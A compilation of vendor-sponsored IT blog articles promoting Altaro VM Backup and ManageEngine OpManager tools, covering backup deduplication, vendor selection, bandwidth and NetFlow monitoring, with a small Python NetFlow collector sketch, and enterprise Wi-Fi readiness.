Deploying a VM backup solution that uses augmented inline deduplication is a great idea if you have limited space on an existing backup target. It’s also a good fit if you are looking at a more expensive SSD option, but do not want to stretch your IT budget to one that will natively store multiple copies of the same Virtual Machine.

An example of some of the storage savings can be seen in the below graphic:

altaro augmented inline deduplication

Most organizations have multiple Virtual Machines with the same operating system. A typical Windows Server can have around 20GB of data just for the Operating System. Consider hundreds of similar VMs with daily backups and long retention policies. The savings can be considerable.

Unlike physical machines, VMs do not usually require additional agents for deduplication or backups to run - there are some exceptions of course.

Summary

In this article we covered the basics of deduplication and analyzed Post-Process Deduplication, Inline Deduplication and Augmented Inline Deduplication. Furthermore, we explained the strengths and weaknesses of each deduplication method and provided examples of how organizations can leverage deduplication for their VM backups and save space and money.

To wrap-up, there are almost no reasons why a deduplication capable VM backup solution should be ignored when choosing your backup platform. There are some caveats depending on your business and technical requirements, but there are several options available to get started with deduplication.

Fortunately, for the most part, Altaro’s Augmented Inline Deduplication features are a good fit for most scenarios and are available at a competitive price point.

Remember, when selecting your VM backup solution, consider the limitations of the various kinds of deduplication and go with what works best for your business.


FREE Webinar - Fast Track your IT Career with VMware Certifications

Everyone who attends the webinar has a chance of winning a VMware VCP course (VMware Install, Config, Manage) worth $4,500!

Climbing the career ladder in the IT industry is usually dependent on one crucial condition: having the right certifications. If you’re not certified to a specified level in a certain technology used by an employer, that’s usually a non-negotiable roadblock to getting a job or even further career progression within a company. Understanding the route you should take, and creating a short, medium, and long term plan for your certification goals is something everyone working in the IT industry must do. In order to do this properly you need the right information and luckily, an upcoming webinar from the guys at Altaro has you covered!

Fast Track your IT Career with VMware Certifications is a free webinar presented by vExperts Andy Syrewicze and Luke Orellana on November 20th outlining everything you need to know about the VMware certification world, including costs, value, certification tracks, preparation, resources, and more.

Free vmware certification webinar

In addition to the great content being discussed, everyone who attends the webinar has a chance of winning a VMware VCP course (VMware Install, Config, Manage) worth $4.5k! This incredible giveaway is open to anyone over the age of 18 and all you need to do to enter is register and attend the webinar on November 20th! The winner will be announced the day after the webinar via email to registrants.

VMware VCP Certification is one of the most widely recognized and valued certifications for technicians and system administrators today however the hefty price tag of $4.5k puts it out of reach of many. The chance to get this course for free does not come along every day and should definitely not be missed!

While the event date has passed, it has been recorded and is available for viewing. All materials are available as direct downloads. Click here to access the event.


6 Key Areas to Consider When Selecting a VM Backup Solution

vm backup considerations

Backup and Disaster recovery are core considerations for any business with an IT footprint, whether that is on-premises or in the cloud.

Your business depends on reliable IT systems to support its core functions. Even a short 1-hour outage can cause considerable disruption and have a financial impact on the business. Given our ever-growing reliance on IT systems, it is more important than ever to choose the right VM Backup software for your business to protect your Virtual Infrastructure (VMware, Hyper-V) and business data in the case of a system failure or security incident, while at the same time providing fast restoration of individual files or folders, server databases or entire VMs.

By utilizing Altaro VM Backup as a case study, this article will guide you through the following 6 main areas which you should consider when choosing your VM Backup solution:

Analyze Your Business Requirements

The most important part of selecting a backup solution is to ensure that the solution will meet your requirements.

There are various requirements that you might have; a few examples are:

Number of Virtual Machines and Hosts

You need to ensure that the backup software is capable of handling the size of your virtualized estate. So if your total number of VMs and hosts is very large or changing constantly, you might want to ensure that the solution is scalable and that it is easy to add additional workloads into the platform.

Type of Backup Storage

Most backup solutions for a virtualized environment are software-based, meaning that they run on top of a Windows Server installation or from within their own appliance which you deploy to your virtualized platform. Other options include a physical appliance with storage built-in.

If you already have storage infrastructure in place, ensure that your choice of backup solution allows connectivity to this backup target natively. If you are looking for a storage device for the backups, consider one which supports simple standards that work over existing networking infrastructure, such as NAS or an SMB network share.

Specialist Features

Be sure to analyse any existing features that you are using or consider new ones as part of your backup solution selection process.

Some of the features to consider include:

Deduplication

Deduplication of the storage used at the target backup location can significantly reduce the amount of storage that is needed to host your backups. Check with your backup vendor what the average deduplication rates are and ensure you check any small print that is attached to any claims.

When we look at deduplication from Altaro’s perspective, they rightfully boast how they can outperform even their closest competitors. With Altaro, you can back up 858GB of VM data into only 390GB of space. Imagine the backup storage cost savings there:

augmented inline deduplication example

Try Altaro's Free VM Backup Solution - Download Now

WAN Optimisation

If you are backing up your Virtual Machines to a secondary site over a WAN connection, consider a solution which includes WAN Optimisation. Bandwidth isn’t free, and this is where WAN optimisation can help: backup data is compressed before it is sent.

In some better implementations, only data that the backup storage doesn’t already have will be sent over the WAN. This can drastically save your bandwidth and avoid “burst” costs by your ISP. WAN Optimization can also free up the link for other uses and applications.

Guest Quiescing

If you have databases which require backing up, ensure your selected solution supports backing up your database type and version. In this scenario it is not enough to back up the Virtual Machines on their own. Typically for databases, an agent needs to be deployed to the machine to instruct the database to flush all writes that are in memory to disk. If you don’t do this, there is a risk that the database will not restore correctly. Something to keep in mind is that with Altaro, Exchange, SQL and other applications only require VMware Tools (in a VMware vSphere environment) for guest quiescing. No additional agents are required.

vm backup - guest quiescing

Instant Restore

Instant restore is a more modern approach to restoring Virtual Machines. Some providers will allow you to instantly map the backup file to your systems so that you can get back online in seconds rather than waiting for several hours for a restore to complete.

Altaro aims to meet all of these business requirements through their VM Backup solution. Altaro supports all common storage types out of the box (Network Drive, NAS, iSCSI, eSATA and USB) with no advanced configuration required:

vm backup select backup location

Furthermore, all of the advanced features that you can think of are supported by Altaro VM Backup including Deduplication, WAN Optimisation, Guest Quiescing via VMware Tools and Instant Restore Technology to bring your backups online in just a few seconds, regardless of their size.

VM Backup - Billing Model & Price

There are various billing models out there these days. Most solutions will charge you a fee per server CPU or by the number of Virtual Machines. Then there is usually a maintenance fee on top which covers support and entitlement to new versions of the software.

With various options available, work out if a per CPU or per VM option is more advantageous for your business. This applies for the long term, so forecast this pricing out over 3 or 5 years. It might also be a good time to see if you can consolidate your Virtual Machines down onto fewer hosts and go for a host-oriented option rather than a per-VM one.

It would also be wise to look into deals on longer-term agreements and, if you have a large estate, to see if there are discounts for signing up to a larger commitment.

Some vendors will offer an OPEX model rather than a fixed price upfront CAPEX solution. Paying monthly can help with budgets so check with your vendor about the options.

When we look at Altaro VM Backup, the billing model is simple; all you need is the number of hosts in your environment and the edition of the software you wish to purchase. 24/7 support and upgrades are included for the first year too; you can purchase software maintenance agreements (SMA) for continued upgrade and technical support in future years. Altaro does not bill you on the number of VMs or sockets, so you can leverage a cost saving over the competition here.

VM Backup – Security & Encryption

Security is a growing concern, so don’t fall into the trap of forgetting about it when looking at your backup solution:

  • Check that your chosen solution can put an air gap between your production Virtual Machines and your backups, to prevent the spread of threats such as ransomware (e.g. CryptoLocker) to your backups.
  • Do you need to encrypt your VM backups? This can slow down your backup jobs and prevent some features from working so ask your shortlisted vendors what the deal is here.
  • For ultra-security-conscious businesses, you might want your backups to be encrypted as the data is sent over the network to your storage device. This can be advantageous, but there are sometimes cheaper options, such as using a VPN or a dedicated VLAN, that protect you to a certain degree.
  • Backup software such as Altaro includes a built-in encryption feature that encrypts all backups with AES 256-bit (military-grade) encryption, removing the need to encrypt backups manually, which could otherwise render the backups inaccessible even to the backup solution itself.

Try Altaro's Free VM Backup Solution - Download Now

Vendor Reputation

Before signing up to a contract with a backup vendor, ask yourself the following questions:

  • How long has the company been in business?
  • How many versions of the software have been released?
  • Is the software supported by your virtualization vendor (VMware, Hyper-V, etc.)?
  • How quickly does the backup vendor’s software support a recently released update from your Virtualization vendor?

For peace of mind, Altaro wins awards every year which are published on their website. They have over 30 awards to their name and a series of impressive independent reviews. Altaro also boasts over 50,000 customers, including:

altaro vm backup customers

Vendor Support

When things go wrong and you have to rely on your backup solution to save the day, you need to know that the vendor support is ready to help you should you need them. Here are some things to consider:

Support Reviews

Look online to see if there are any reviews on the solution you are looking at purchasing.

A quick Google search should be all you need to see if there are any major issues with the software.

Service Level Agreements

When you receive your terms, review the support clauses to see if the SLAs are in line with your expectations. Ideally, you want the vendor to respond fairly quickly to your support requests especially if they are related to a restore.

Support Availability

For availability, the two main areas for consideration are:

  • Can you phone or email the support team?

Being able to call the support team is important because other methods such as email and chat are slow and might be triaged for several hours or misclassified into another severity level. Phone support is incredibly important when looking at your options.

  • Support hours

It always feels as though we need support at the worst possible time. Trying to get an application or Virtual Machine restore completed through the evening so that it is ready for the morning can be a challenge. With this in mind, we should try to choose a VM backup vendor that has a 24/7 helpdesk who you can call at any time and log a case.


One of the great things about Altaro is their support. They commit to responding to support calls in under 30 seconds. Guaranteed!

altaro customer support

Summary

This article helped identify the main considerations for your VM Backup solution to ensure business continuity, data integrity, data availability and more. We talked about the importance of the number of VMs and hosts supported by the VM backup solution, the type of backup storage supported, advanced storage space conservation techniques such as Augmented Inline Deduplication, WAN Optimization techniques to maximise your backups over WAN links, Guest Quiescing for database backups, Instant Restore capabilities for fast restoration, billing and pricing models, VM backup security and encryption, and vendor support.

We believe that Altaro fits the needs of most organisations thanks to their scalable, feature-rich solution. An average call pickup time of only 22 seconds, straight to a product expert with no gatekeepers in the way of your support experience, is enough on its own for most to look at Altaro as a viable solution.


Artificial Intelligence For IT Operations (AIOps) - Why You Should Care (or not)

aiops for it operations intro

In the rapidly evolving landscape of IT operations, organizations are increasingly turning to Artificial Intelligence for IT Operations (AIOps) to streamline their processes, enhance efficiency, and overcome the challenges of managing complex and dynamic IT environments.

AIOps combines artificial intelligence, machine learning, and big data analytics to deliver powerful insights and automation capabilities that drive transformative benefits. In this article we'll explore the significance of AIOps in the modern IT era.


Download your free complete guide to Artificial Intelligence for IT Operations.

AIOps abstract architecture (Free ManageEngine Whitepaper)

Proactive Problem Resolution

AIOps enables organizations to move away from reactive approaches to IT management. By leveraging machine learning algorithms and advanced analytics, AIOps can identify patterns, anomalies, and potential issues in real-time. This proactive approach empowers IT teams to address problems before they impact end-users, improving system availability, and reducing mean-time-to-resolution.

Event noise filtering with the help of AIOps (Free ManageEngine Whitepaper)



Elevate your network management: Maximizing efficiency with ManageEngine Network Configuration Manager

ManageEngine Network Configuration Manager

As technology evolves, so do our networks. Today's sprawling network infrastructures are intricate ecosystems, demanding more from IT teams than ever before. Configuration management, compliance enforcement, and firmware & software updates are just a few of the growing requirements that strain manual processes.

While manual network management might have sufficed in simpler times, it hinders scalability in complex environments. It can also introduce security vulnerabilities and leave your network prone to human error.

To navigate this new reality, organizations need a better approach—they need to leverage a network configuration management tool.

Now, let's explore how a network configuration management tool can help revolutionize your modern network, unlocking a new era of scalability and security.



Manual Configuration Management Challenges: Why a Configuration Management Tool is a Game-Changer



Maximizing Network Security: A Deep Dive into OpManager's Firewall Analyzer Add-on

01 opmanager firewall analyzer intro

In the rapidly evolving landscape of cyber threats, network security has never been more crucial. With the frequency and sophistication of cyberattacks escalating, organizations are under constant pressure to safeguard their networks. According to Sophos' The State of Ransomware 2023 report, 66% of organizations were hit by ransomware in 2023, and this trend is only going to keep growing with time. Additionally, Top10VPN estimates that VPN-related vulnerabilities increased by 47% in 2023. These statistics highlight the urgent need for robust network security solutions.

Traditional Network Monitoring: A Growing Inadequacy

Historically, network monitoring solutions have focused on tracking performance metrics, bandwidth usage, and basic security alerts. While these tools have been effective to an extent, the current cyberthreat landscape demands more advanced capabilities. Traditional monitoring is often reactive, identifying issues after they occur, which is no longer sufficient. As cyberthreats become more complex, there's a clear need for proactive, comprehensive security measures.

Introducing ManageEngine Firewall Analyzer

To address these growing challenges, a network security management tool like ManageEngine Firewall Analyzer is indispensable. Firewall Analyzer is a powerful tool designed to enhance firewall management and bolster network security. It provides detailed insights into firewall activity, monitors traffic, detects anomalies, and ensures compliance with security policies. By integrating seamlessly with ManageEngine OpManager, Firewall Analyzer serves as a comprehensive security management solution.

How Firewall Analyzer Bolsters OpManager

Firewall Analyzer is available as both a standalone product and an add-on for OpManager. When combined, these tools offer a powerful synergy that significantly enhances network security. Here is how:

  • Comprehensive Traffic Analysis: Firewall Analyzer provides detailed visibility into your network traffic. It analyzes inbound and outbound traffic to detect unusual patterns, potential threats, and bandwidth usage. This detailed analysis is crucial for preventing security breaches and optimizing network performance.




Boost Network Security and Efficiency with Intelligent Notifications and Automated Fault Handling. Unified IT Operations Management Tool

OpManager - intelligent notifications automated fault handling

Network alerts are vital for maintaining your network's health, efficiency, and security, ensuring seamless daily operations. They act as an early warning system, alerting you to potential issues before they escalate into major problems. These alerts provide crucial insights into the performance and security of your network, enabling proactive measures to address minor faults before they turn into significant disruptions.

Ignoring the importance of a reliable network & security alerting system can lead to frequent disruptions, degraded network performance, compromised business operations, and security vulnerabilities, driving customers away or disrupting the smooth operation of your organization. Frequent disruptions can cause downtime, affecting productivity and leading to financial losses. Compromised business operations can damage your company's reputation, making it difficult to maintain customer trust and loyalty. Security vulnerabilities pose a risk of data breaches, resulting in the loss of sensitive information and potential legal consequences.

By implementing a dedicated system to monitor, manage, alert on, and resolve faults, your company can run smoothly and securely. This system ensures that any irregularities are promptly identified and addressed, minimizing downtime and maintaining operational efficiency. It also enhances security by detecting and mitigating potential threats before they cause harm.


Discover how OpManager can transform and fully automate your network monitoring.

The Significance of Network & Security Alerts

A robust alerting system empowers your IT team to manage the network more effectively, allowing them to focus on strategic initiatives rather than constantly troubleshooting issues. For customers, it means a reliable and uninterrupted service experience, which is essential for building trust and satisfaction. Ultimately, a seamless, hassle-free experience for both your team and customers translates to improved business performance and a stronger competitive edge in the market.

OpManager's Robust Alerting System

Let's consider a practical scenario involving a social media platform:

  • Event 1: Users experience sluggish app loading and multiple page crashes.
  • Event 2: IT admins see a significant boost in incoming traffic but nothing alarming or unusual.
  • Event 3: Users begin to send in reports and complaints once they observe an outage.
  • Event 4: The organization finally decides to look into the issue and ends up finding an anonymous malware attack that has been extracting the data of the platform's users.
  • Event 5: The attack intensifies, causing a loss of customer trust, data loss, a bad reputation, and more.
  • Event 6: The issue gets addressed, and normalcy is restored. However, the damage to the platform's reputation, the cost of reputation management, and getting the system back up have cost the company millions of dollars.

This could have been averted if a network alerting tool had been in place to detect, analyze, and fix the issue before it had disruptive impacts.

Let's discuss the impacts in detail.



Network Management Systems Help Businesses Accurately Monitor Important Application Performance, Infrastructure Metrics, Bandwidth, SLA Breaches, Delay, Jitter and more

Accurately monitoring your organization’s business application performance, service provider SLA breaches, network infrastructure traffic, bandwidth availability, Wi-Fi capacity, packet loss, delay, jitter and other important metrics throughout the network is a big challenge for IT Departments and IT Managers. Generating meaningful reports for management, with the ability to focus on specific metrics or details, can be an impossible task without the right Network Management System.

The continuous demand for business network infrastructure to support more applications, protocols and services, uninterrupted, has placed IT departments, IT Managers and, subsequently, the infrastructure they manage under tremendous pressure. Knowing when the infrastructure is reaching its capacity and planning ahead for necessary upgrades is a safe strategy most IT Departments try to follow.

The statistics provided by the Cisco Visual Networking (CVN) Index Forecast predict exponential growth in bandwidth requirements over the coming 5 years:

cisco visual networking index forecast

These types of reports, along with the exponential growth of bandwidth & speed requirements for companies of all sizes, raises a few important questions for IT Managers, Network Administrators and Engineers:

  • Is your network ready to accommodate near-future demanding bandwidth requirements?
  • Is your current LAN infrastructure, WAN and Internet bandwidth sufficient to efficiently deliver business-critical applications, services and new technologies such as IoT, Wi-Fi - 802.11n and HD Video?
  • Do you really receive the bandwidth and SLA that you have signed for with your internet service provider or are the links underutilized and you are paying for expensive bandwidth that you don’t need?
  • Do you have the tools to monitor network conditions prior to potential issues becoming serious problems that impact your business?

All these questions and many more are discussed in this article aiming to help businesses and IT staff understand the requirements and impact of these technologies on the organization’s network and security infrastructure.

We show solutions that can be used to help obtain important metrics, monitor and uncover bottlenecks, SLA breaches, security events and other critical information.


Finally, we must point out that basic knowledge of networking and design concepts is recommended for this article.

Click to Discover how a Network Management System can help Monitor your Network, SLAs, Delay Jitter and more.

Network Performance Metrics and their Bandwidth Impact

Network performance metrics vary from business to business and provide the mechanism by which an organization measures critical success factors.

The most important performance metrics for business networks are as follows:

  • Connectivity (one-way)
  • Delay (both round-trip and one-way)
  • Packet loss (one-way)
  • Jitter (one-way) or delay variation
  • Service response time
  • Measurable SLA metrics

Bandwidth is one of the most critical variables of an IT infrastructure and can have a major impact on all the aforementioned performance metrics. Oversaturated links can cause poor network performance with high packet loss, excessive delay, and jitter, which can result in lost productivity and revenue, and increased operational costs.

New Applications and Bandwidth Requirements

This rapid growth in bandwidth demand affects Enterprises and Service Providers, which are continually challenged to efficiently deliver business-critical applications and services while running their networks at optimum performance. The necessity for more expensive bandwidth solutions is one of the crucial factors that may have a major impact on network and application performance. Let’s have a quick look at the new technologies with high bandwidth needs which require careful bandwidth and infrastructure planning:

High Definition (HD) Video Bandwidth Requirements

HD video surpassed standard definition by the end of 2011. User demand for HD video has a major impact on a network due to its demanding bandwidth requirements, as clearly displayed below:

dvd 720 1080p bandwidth requirements

DVD, 720p HD and 1080p HD bandwidth requirements:

  • (H.264) 720p HD video requires around 2.5 Mbps or twice as much bandwidth as (H.263) DVD
  • (H.264) 1080p HD video requires around 5Mbps or twice as much bandwidth as (H.264) 720p
  • Ultra HD 4320p video requires around 20Mbps or four times as much bandwidth as (H.264) 1080p

BYOD and 802.11ac Bandwidth Requirements

802.11ac is the next generation of Wi-Fi. It is designed to give enterprises the tools to meet the demands of BYOD access, high bandwidth applications, and the always-on connected user. The 802.11ac IEEE standard allows for theoretical speeds up to 6.9 Gbps in the 5-GHz band, or 11.5 times those of 802.11n!

Taking into consideration the growing trend and adoption of Bring-Your-Own-Device (BYOD) access, it won’t be long until multi-gigabit Wi-Fi speeds will become necessary.

Virtual Desktop Infrastructure (VDI) Bandwidth Requirements

Each desktop delivered over the WAN can consume up to 1 Mbps of bandwidth, and considerably more when employees access streaming video. In companies with many virtual desktops, traffic can quickly exceed existing WAN capacity, noticeably degrading the user experience.

Cloud IP Traffic Statistics

Annual global cloud IP traffic will reach 14.1 ZB (1.2 ZettaBytes per month) by the end of 2020, up from 3.9 ZB per year (321 ExaBytes per month) in 2015. Annual global data center IP traffic will reach 15.3 ZB (1.3 ZB per month) by the end of 2020, up from 4.7 ZB per year (390 EB per month) in 2015. These forecasts are provided by the Cisco Global Cloud Index (GCI), which is an ongoing effort to forecast the growth of global data center and cloud-based IP traffic.

Application Bandwidth Requirements and Traffic Patterns

Bandwidth requirements and traffic patterns are not uniform across applications and need careful planning, as displayed below:

Data, Video, Voice and VDI bandwidth requirements & traffic patterns

An effective strategy is essential in order to monitor network conditions prior to potential issues becoming serious problems. Poor network performance can result in lost productivity, revenue, and increased operational costs. Hence, detailed monitoring and tracking of a network, applications, and users are essential in optimizing network performance.

Network Monitoring Systems (NMS) for Bandwidth Monitoring

An NMS solution needs to keep track of what is going on in terms of link bandwidth utilization and whether it is within the normal (baseline) limits. In addition, network and device monitoring helps network operators optimize device security either proactively or in a fast, reactive approach. Standard monitoring protocols such as Simple Network Management Protocol (SNMP) and NetFlow make the raw data needed to diagnose problems readily available. Finally, historical network statistics are an important input to the calculations when planning a bandwidth upgrade.

SNMP can easily provide essential network device information, including bandwidth utilization. In particular, the NMS can monitor bandwidth performance metrics such as backplane utilization, buffer hits/misses, dropped packets, CRC errors, interface collisions, interface input/output bits, & much more periodically via SNMP.

Network devices can be monitored via SNMP v1, 2c, or 3 and deliver bandwidth utilization for both inbound and outbound traffic. An XML API can be used to monitor and collect bandwidth statistics from supported devices such as Cisco UCS Manager. In addition, network maps with bandwidth utilization graphs can visualize the flow of bandwidth and spot bottlenecks at a glance.

Bandwidth issues reported by users, such as delays and slow application response, cannot be identified with SNMP-based information alone. Technologies such as Cisco NBAR, NetFlow, Juniper J-Flow, IPFIX, sFlow, Huawei NetStream or CBQoS are needed to understand bandwidth utilization across applications, users and devices. With these technologies it is possible to perform in-depth traffic analysis and determine in detail the who, what, when and where of bandwidth usage.
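
As a rough illustration of what flow-based monitoring does under the hood, the sketch below is a minimal NetFlow v5 collector written in Python: it listens on UDP port 9996 (the same default NetFlow port mentioned later in this article) and totals bytes per destination port. It handles only the fixed v5 packet layout and ignores sampling, v9/IPFIX templates and sequence checking, so it is a learning aid rather than a real collector:

# Minimal NetFlow v5 collector sketch: totals bytes per destination port.
# Not production code: no v9/IPFIX template support, no sampling correction,
# no sequence-number checks.
import socket
import struct
from collections import Counter

HEADER_FMT = "!HHIIIIBBH"                  # 24-byte NetFlow v5 header
RECORD_FMT = "!4s4s4sHHIIIIHHBBBBHHBBH"    # 48-byte NetFlow v5 flow record
HEADER_LEN = struct.calcsize(HEADER_FMT)
RECORD_LEN = struct.calcsize(RECORD_FMT)

bytes_per_dst_port = Counter()

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("0.0.0.0", 9996))               # default NetFlow listening port

while True:
    datagram, exporter = sock.recvfrom(8192)
    if len(datagram) < HEADER_LEN:
        continue
    version, count = struct.unpack_from("!HH", datagram, 0)
    if version != 5 or len(datagram) < HEADER_LEN + count * RECORD_LEN:
        continue                           # v9/IPFIX would need template parsing
    for i in range(count):
        fields = struct.unpack_from(RECORD_FMT, datagram, HEADER_LEN + i * RECORD_LEN)
        d_octets = fields[6]               # bytes in this flow (dOctets)
        dst_port = fields[10]              # destination transport port
        bytes_per_dst_port[dst_port] += d_octets
    print(f"Top destination ports by bytes (exporter {exporter[0]}):",
          bytes_per_dst_port.most_common(5))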

Finally, performance thresholds and reporting topN devices with specific characteristics (TopN reporting) are useful, both for noticing when capacity is running out, and for easily correlating service slowness with stressed network or server resources. Those metrics can be the first indication of an outage, or of potential SLA deterioration to the point where it affects delivery of services.

ManageEngine OpManager 12 NMS Features

OpManager is the NMS product offered by ManageEngine. OpManager can be easily installed and deployed, and provides all the visibility and control that you need over your network.

In brief, it offers the following main features:

  • Physical and virtual server monitoring
  • Flow-based bandwidth analysis
  • Firewall log analysis and archiving
  • Configuration and change management
  • IP address and switch port management

The tools mentioned below provide in-depth visibility into network bandwidth performance. They can help you prepare your network for the deployment of new technologies and measure the network performance indexes discussed in the previous sections. In particular, OpManager offers the following tools to achieve complete network bandwidth visibility:

Bandwidth Monitoring: Tracks network bandwidth usage in real-time and provides info for the topN users consuming bandwidth on a network.

Router Traffic Monitoring: Continuously monitors networking devices using flows and generates critical information to ensure proper network bandwidth usage.

Cisco AVC Monitoring: in-depth visibility on the bandwidth consumption per application. Ensure business critical applications get maximum priority. Forecast future bandwidth needs and prepare your network before deploying new services and technologies.

Advanced Security Analytics Module: Detect threats and attacks using continuous Stream Mining Engine technology. This ensures high network security and a method to detect and eliminate network intruders.

Cisco IPSLA Monitoring: Monitor critical metrics affecting VoIP, HD Video performance, VDI and ensure best-in-class service levels. Ensure seamless WAN connectivity through WAN RTT monitoring.

Cisco NBAR Reporting: Recognize a wide variety of applications that use dynamic ports. Classify and take appropriate actions on business critical and non-critical applications.

ManageEngine OpManager 12 Trial Version Installation

The installation of the OpManager 12 trial version is discussed in this section. The installation is very simple and fast; it took us less than 5 minutes.

Two options are provided during the installation:

  • 30-day trial without any limitation on the number of devices and interfaces
  • Free edition where you can monitor up to 10 devices

We installed the 30-day trial version. You can easily uninstall the trial version in less than 2 minutes after the product evaluation, by following the OpManager uninstall wizard. Let’s rock!

We start by downloading the Windows or Linux installation file of OpManager from the following link:


Downloading OpManager for Windows or Linux systems

Once downloaded, run the file to initiate the Install Wizard, which guides us through the installation process.

After accepting the license agreement, we select the installation mode. We chose the 30-day trial version, which is more than enough for evaluating ManageEngine OpManager 12:


Selecting between OpManager 30 Day Trial or Free Edition

Next, we select the language and installation path, followed by the ports required by OpManager. In particular, port 80 is the default web server port of OpManager and port 9996 is the default port on which it listens for NetFlow packets. Both ports can easily be changed during installation.


Selecting and changing OpManager WebServer and NetFlow ports

Next, we skip the Registration for Technical Support since we don’t require it for the evaluation of the product. OpManager will now commence its installation process.

When the file copy process is complete, we are prompted to select whether we are installing a Primary or Standby server. Redundancy is not required for our product evaluation:


Selecting between Primary and Standby OpManager Installation

The next option allows OpManager to be installed with either MSSQL or PostgreSQL, the latter being the fastest installation option. PostgreSQL is bundled with the product and is a great option for evaluation purposes:


Selecting between OpManager with PostgreSQL or MSSQL

We managed to complete the installation process in less than 3 minutes!

As soon as we hit the Finish button, the initialization of the modules starts. Meanwhile we can take a quick look at the Readme file which includes useful information about the product.

OpManager launches in less than a minute after completing its initialization. The welcome tour introduces us to the main functionalities of the product:


OpManager’s welcome tour

We are now ready to start working with and exploring the product. You can start by discovering your network devices. It is a powerful tool with plenty of capabilities.


OpManager Network Device Discovery

Selecting the Overview tab from the left column, we see (screenshot below) useful information about Network, Server, Virtualization, NetFlow, Network Configuration Management (NCM), Firewall and IP Address Management (IPAM), covering all the essential components that should be monitored in a network:

NOTE: The single discovered device shown is by default the Server where OpManager is installed.


OpManager discovered devices and network view

All installed features and application add-ons enabled for the 30 day evaluation period are shown:

OpManager installed options and product details

Summary

Bandwidth availability is a critical factor that has a major impact on a network and also affects application performance. The introduction of new IT technologies and policies, such as BYOD and HD video, requires careful planning, provisioning and monitoring by a sophisticated, reputable NMS. The NMS should not only monitor bandwidth utilization but also perform in-depth traffic analysis and determine in detail the who, what, when and where of bandwidth usage. OpManager 12 is an NMS solution that includes all the tools for bandwidth and application monitoring by utilizing NBAR, NetFlow, SNMP and XML-API technologies, helping IT departments and IT managers get centralized visibility of their network that was previously impossible.


Ensuring Enterprise Network Readiness for Mobile Users – Wi-Fi, Bandwidth Monitoring, Shadow IT, Security, Alerts

Demands on enterprise networks to properly support mobile users are continuously rising, making it more necessary than ever for IT departments to provide high-quality services to their users. This article covers 4 key areas affecting mobile users and enterprise networks: Wi-Fi coverage (signal strength – signal-to-noise ratio), Bandwidth Monitoring (Wi-Fi links, network backbone, routers, congestion), Shadow IT (usage of unauthorized apps) and security breaches.

Today, users are no longer tied to their desktops or laptops; they are mobile. They can reply to important business emails, access their CRM, collaborate with peers, share files with each other and much more from the cafeteria or the car park. This means it is high time for network admins at enterprises to give wireless networks the same importance as wired networks: wireless networks should be equally fast and secure.

Though the use of mobile devices for business activities is a good thing for both enterprises and their customers, it also has some drawbacks on the network management side. The top 4 things to consider to make your network mobile-ready are:

  • Wi-Fi signal strength
  • Bandwidth congestion
  • Shadow IT
  • Security breaches and attacks

Figure 1. OpManager Network Management and Monitoring

Wi-Fi Signal Strength

A good Wi-Fi signal is a must throughout the campus. Employees must not experience any connectivity problems or slowness because of poor signal quality. The signal should be as good as the ones provided by the carriers. However, it is not easy to maintain good signal strength throughout the building. Apart from the Wireless LAN Controller (WLC) and Wireless Access Points (WAP), channel interference also plays a major role in maintaining good Wi-Fi signal strength.

RF interference is the noise or interference caused by other wireless and Bluetooth devices such as phones, mice, remote controls, etc. that disrupts the Wi-Fi signal. Since all these devices operate in the same 2.4 GHz and 5 GHz bands, they degrade Wi-Fi signal strength. When a client device receives another Wi-Fi signal it will defer transmission until that signal ceases. Interference that occurs during transmission also causes packet loss. As a result, Wi-Fi retransmissions take place, which slow down throughput and result in wildly fluctuating performance for all users sharing a given access point (AP).


A common metric for measuring Wi-Fi signal strength is the Signal-to-Noise Ratio (SNR). SNR is the ratio of signal power to noise power, expressed in decibels. An SNR of 41 dB is considered excellent, while 10-15 dB is considered poor. However, as soon as interference is experienced, SINR is the metric to look for. SINR is the Signal-to-Interference-plus-Noise Ratio, which gives the difference between the signal level and the combined level of interference and noise. Since RF interference disrupts user throughput, SINR reflects the real performance level of the Wi-Fi system. A higher SINR is considered good as it indicates higher data rates.
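
The relationship between SNR and SINR is easy to express numerically. The short Python sketch below derives both from hypothetical received signal, noise and interference levels in dBm; the values are illustrative only, not measurements from a real site survey:

# SNR and SINR from received power levels (illustrative values, not measurements).
import math

def dbm_to_mw(dbm: float) -> float:
    return 10 ** (dbm / 10)

signal_dbm       = -55.0   # received Wi-Fi signal
noise_dbm        = -95.0   # noise floor
interference_dbm = -80.0   # e.g. a neighbouring AP on the same channel

snr_db = signal_dbm - noise_dbm            # in dB, SNR is a simple subtraction
sinr_db = 10 * math.log10(dbm_to_mw(signal_dbm) /
                          (dbm_to_mw(interference_dbm) + dbm_to_mw(noise_dbm)))

print(f"SNR:  {snr_db:.1f} dB")            # 40.0 dB -> excellent, per the figures above
print(f"SINR: {sinr_db:.1f} dB")           # ~24.9 dB -> lower, since interference adds to noise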

Figure 2. OpManager: Network Analysis – Alarms, Warnings and Statistics

Shadow IT

Employees making use of third-party apps or services, without the knowledge of IT, to get their job done is known as Shadow IT. Though it lets employees choose the apps or services that work for them and be productive, it also leads to conflicts and security issues. Using apps that are not verified by the IT team may cause serious security breaches and may even lead to the loss of corporate data.

It is tough to restrict shadow IT because employees keep finding apps and services that they feel comfortable or easy to work with. Satisfied users then spread such apps and services among their peers by word of mouth. Sometimes this creates conflicts with existing IT policy and slows down operations. Nevertheless, the adoption of shadow IT is on the rise: according to one study, shadow IT exists in more than 75% of enterprises and is expected to grow further.

Security Breach & Attacks

Public Wi-Fi hotspots are favorites for hackers, who try to steal data from the mobile devices that connect to them. A few years back, The Guardian, a UK-based newspaper, deployed a mock Wi-Fi hotspot at an airport to demonstrate how critical information such as email IDs, passwords, credit card data, etc. can be harvested via a Wi-Fi connection. Many travelers connected to the hotspot and entered their details, which fraudsters could have misused in the case of a real attack.

Figure 3. OpManager: Network Bandwidth, QoS and Policy Utilization

It is almost impossible for employees, or anyone for that matter, to refrain from connecting to public Wi-Fi when travelling or in public places. However, hackers use public Wi-Fi to inject malicious code that acts as a Trojan, which in turn helps them steal corporate data.

Bandwidth Congestion

Admins have little control over employees using their mobile devices for personal purposes as well, which includes accessing sites such as Facebook, WhatsApp, YouTube, Twitter, etc. They cannot totally restrict this, as the world is becoming more social, at least online, and they have to allow such apps. However, it should not take a toll on employees accessing business-critical apps.

Buying additional bandwidth is the usual approach to solving a bandwidth crisis. However, that is not an effective way to manage bandwidth in enterprise networks, and most enterprises already spend heavily on bandwidth. According to a survey we conducted among Cisco Live US 2015 attendees, 52% of them spend more than $25,000 per month on bandwidth.

Effective Wireless Network Management Is The Need Of The Hour

